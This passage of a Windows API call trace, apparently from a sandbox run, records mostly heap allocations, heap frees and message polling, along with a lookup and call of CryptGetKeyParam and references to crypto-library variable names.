Size=0x10) returned 0x9bd468 [0179.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0179.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0179.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0179.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0179.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0179.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0179.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.034] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0179.034] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2848, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2848*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.036] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.036] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0179.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.037] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.037] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.037] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.037] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.037] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.037] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.037] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.037] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.065] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.065] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.065] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.065] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.065] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 